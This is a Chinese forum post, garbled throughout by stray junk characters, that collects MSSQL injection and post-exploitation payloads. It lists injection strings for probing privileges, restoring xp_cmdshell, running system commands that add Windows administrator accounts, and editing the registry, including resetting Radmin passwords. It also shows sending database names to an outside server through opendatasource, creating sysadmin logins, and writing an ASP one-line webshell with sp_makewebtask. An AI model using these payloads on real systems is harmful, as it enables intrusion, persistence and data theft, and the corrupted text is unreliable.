//看看是什么权限的; N* }* }" }1 ]& [: F
and 1=(Select IS_MEMBER('db_owner'))
1 M. j+ b7 F) s# G% QAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
! a" f, z' y5 m- ~4 J6 n. {, R& Y
: I; j) |- F& b% w( g//检测是否有读取某数据库的权限
: ^' w. f& m0 m3 pand 1= (Select HAS_DBACCESS('master'))
, s# z; I5 e. m* n- V' O, }And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
5 _" X7 R: N j& s
* @# ]- a0 g7 B( }+ i2 r
, [+ o% l& R; `; ` K o数字类型$ s5 \) Z. @4 ]
and char(124)%2Buser%2Bchar(124)=0
" }9 c; C3 `) W- j, I, s. m% {8 G/ l2 _0 w) a4 d8 {
字符类型
( T3 N( `2 O8 R) i; I$ |2 J" x' and char(124)%2Buser%2Bchar(124)=0 and ''='
- ^: V& b) _0 K8 \' u5 K$ m- _0 u6 t% B: u" _: Q. T/ |- Q
搜索类型
* a3 f" _6 J: n' and char(124)%2Buser%2Bchar(124)=0 and '%'='. i' O6 z5 N& y1 M m2 |
3 R: [) W# z" o# j0 n爆用户名
( V a( @ A' z$ i. b- o/ i6 D8 U. _: Yand user>0
6 Z, Y7 F4 `& ?, u' and user>0 and ''='
- c8 V4 \0 z3 n" h
3 f1 M% |! ]; S& l4 N# ^检测是否为SA权限
2 p; V5 I' ?- F5 J8 n, oand 1=(select IS_SRVROLEMEMBER('sysadmin'));--# X+ Q. ~# {, e* X) A4 ~
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --. J/ y3 [9 U+ F# p6 g4 P
& m% w7 R5 y+ j. F0 a* e0 e检测是不是MSSQL数据库
& E$ y( ?8 w8 o8 M+ Q6 h: Cand exists (select * from sysobjects);--
7 i# C6 p& g" a, H8 F0 i2 J- ]1 O* k! o
检测是否支持多行% r# Z0 _8 f! Y5 Y6 |7 u
;declare @d int;--
' L% }( r0 ?% G3 y
+ F- P1 q' D% r4 d恢复 xp_cmdshell
$ r' M( R7 t, ? y) N3 R0 @;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
2 \: d$ J1 t# X8 s9 c7 X
; w8 N! p. Q- D
, ^0 C: y, T7 e' nselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')2 t# s1 F; u8 O4 U7 D( I
! P T: G; n( c3 _$ g1 k1 h
//-----------------------7 O' s) s; M2 ^, D3 y9 f' g
// 执行命令3 m/ n t! E3 ~; U, J# k" ?" A
//-----------------------
2 i# ?. f3 }; d, m4 D. G5 M8 j首先开启沙盘模式:% `; S, }6 W3 X
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1" X1 _9 [$ c4 n- h! V" ]
5 s" O0 B' _) X2 r5 e
然后利用jet.oledb执行系统命令( [; a# Y) W; Q. h2 H
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')6 o4 F8 q" O! u6 w; r. O2 l' u+ W
6 u. F7 W8 P; N, x# r, p8 O4 ]
执行命令7 m% N0 x% @* [; ~2 w1 k# H
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
/ \$ J+ G! @9 I
, r- U# J: {; j3 _9 ^" VEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
) |2 R4 u. [, w; K( w7 u% H' Y6 z+ u$ g$ R* y
判断xp_cmdshell扩展存储过程是否存在:9 o# f* v/ ^4 e3 o5 e9 v
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
4 `& o+ @' p4 I% O# l) ] k) G: Y' h* X- T$ K( h+ p
写注册表* O4 P% d) {% k2 j8 g6 N* ]3 Q d
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
& ^0 |$ v! {; j0 \$ ?
2 l) U3 b* e. X, {' b8 MREG_SZ
: G' Q! R5 v2 l
! W- y U# X& y$ o读注册表
" x; |3 c+ f( k- [' l6 t4 Aexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
( Q4 Q; d% m2 J6 p+ x6 f# f" n) f8 |7 ~ e7 n; v
读取目录内容
4 G- A; y. c6 ]$ ~6 K: kexec master..xp_dirtree 'c:\winnt\system32\',1,1 E! ?0 i* x3 G8 x$ d0 j, m# z
" M( I$ Z+ g# f4 B
- P, w/ [5 o9 [1 v) t数据库备份- L/ `+ B9 n) |1 i V
backup database pubs to disk = 'c:\123.bak'3 j8 J, V; Z" K/ P& ^( ]
T, ^! s- v9 _$ z% r1 N7 B//爆出长度
( T4 I8 g- g& ~; ] rAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--) o* J1 n* |2 ]4 _
# k' q6 C1 x# ]/ }9 x2 I
9 Y* ]; J& \3 E' j, s" _$ N% K+ r$ _' q
更改sa口令方法:用sql综合利用工具连接后,执行命令:
( A0 c1 l; p+ k9 V3 O% Uexec sp_password NULL,'新密码','sa'# k$ T1 W" {$ Q- i( K C. ~4 W
I( q1 l6 K/ W6 V. E0 W; r
添加和删除一个SA权限的用户test:
/ i1 s% B( r9 O% p2 b' v; rexec master.dbo.sp_addlogin test,95307723 f: J# ~, E q
exec master.dbo.sp_addsrvrolemember test,sysadmin
9 r4 w. c7 m$ _) Z4 t* b- {/ _
8 P$ i: z, N% _7 a删除扩展存储过过程xp_cmdshell的语句:
C n1 f1 s2 d0 A' e5 o& b9 zexec sp_dropextendedproc 'xp_cmdshell'
% n$ z4 ]" I& c7 S7 }9 X. G( d6 Z& Q
添加扩展存储过过程2 U8 b0 Z" z3 d* D/ Z$ }
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'4 }3 l/ b( q. y* X8 x; l
GRANT exec On xp_proxiedadata TO public
1 Q: W( Y# V2 p. n
- V( _+ _ T; G) \' ?# c$ G! y) s( E3 I6 v: b
停掉或激活某个服务。: o4 }+ P: ^, T, [+ Z
* i( F7 T# ~( h/ | y2 N+ M$ K7 Vexec master..xp_servicecontrol 'stop','schedule'' x& c3 T |8 x f$ a
exec master..xp_servicecontrol 'start','schedule'
8 V2 s, P, x7 I; Q) E2 G! v- u" \
dbo.xp_subdirs
( H( k: U5 R. _) f' R& b. a
. l$ |" o1 ^ q只列某个目录下的子目录。
& @ m+ u3 q6 x$ [) Fxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
: F2 h/ t4 ^) c8 r1 g1 g% B2 A6 R; {$ b
dbo.xp_makecab' S/ n# Z* z# Q% I7 v2 `
% Q' J$ k1 A$ U ]* ?* K
将目标多个档案压缩到某个目标档案之内。
/ r& R' Q8 c1 H+ R, b* ^4 c- Z所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
# X: u* k. f6 f+ C( h
( _8 E% m A0 K Tdbo.xp_makecab! I$ r2 ?( j( }# p2 A. O* v/ f
'c:\test.cab','mszip',1,7 h% Z% P1 t* ~1 `8 x7 m% X% I5 E
'C:\Inetpub\wwwroot\SQLInject\login.asp',
( O3 W4 x! L q) _" V0 t'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
+ |; ]& ?# v. J& i. Q
1 g/ n4 u- a$ T1 }' M7 o7 t/ J, @( Lxp_terminate_process% h: @" V6 a8 E' f
r( g# A5 O2 i% @+ j, r
停掉某个执行中的程序,但赋予的参数是 Process ID。
$ B8 }3 L8 K* Z/ Y利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID# b* k0 w" Q, L, ~8 a+ v$ c7 t, e
3 Y- M1 i- _" f
xp_terminate_process 2484
/ F1 P" }( g( U* e
) i# S" R. M0 {) ^5 `& A8 |+ A2 Rxp_unpackcab
( L1 m# Y' {5 r, a
" |) e$ U1 c, \& I0 g* s6 ]+ ?' U解开压缩档。
* l+ ?0 J; k7 F9 `$ N4 C6 V7 L8 C; W4 A9 x k/ g5 V0 p
xp_unpackcab 'c:\test.cab','c:\temp',1& ?+ S8 D6 h0 k- {: k
7 l! s7 H/ B1 O3 V: @4 W% X
D- O3 g9 H2 {某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12344 ^& r2 C) Z6 n2 `0 }- E4 f
7 ~3 G, {% m4 }5 `
create database lcx;# A2 Z9 S; S3 X$ v' M, t
Create TABLE ku(name nvarchar(256) null);0 W4 n5 `$ p8 p
Create TABLE biao(id int NULL,name nvarchar(256) null);3 B% x5 F- Z& t9 `
# k( h4 Q; \; R/ o4 U( E6 M
//得到数据库名) G( n; Z- c4 I @9 E; \$ c
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
( ], H; _( m8 |+ p2 k: U! j, H- |( h. I! X
8 B7 ~$ _. I9 A
//在Master中创建表,看看权限怎样4 O% c3 g" `' x. T3 Z, _2 }6 T
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--+ d' E* V+ b P& c9 m5 g7 U- d3 v
/ R+ n1 n5 I' }; G8 }3 Z0 c w
用 sp_makewebtask直接在web目录里写入一句话马:4 Q7 ]( e+ g" |6 O# J2 g5 }
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
7 R0 l2 g& {2 D$ L4 k8 F7 F! V+ z
//更新表内容
' ?$ f" k0 ~$ U" T7 A6 i. w" B& FUpdate films SET kind = 'Dramatic' Where id = 123& D8 }0 c B- v' X5 {
/ i. r. a. O! O; B//删除内容1 o0 i+ X: Q! t6 t
delete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对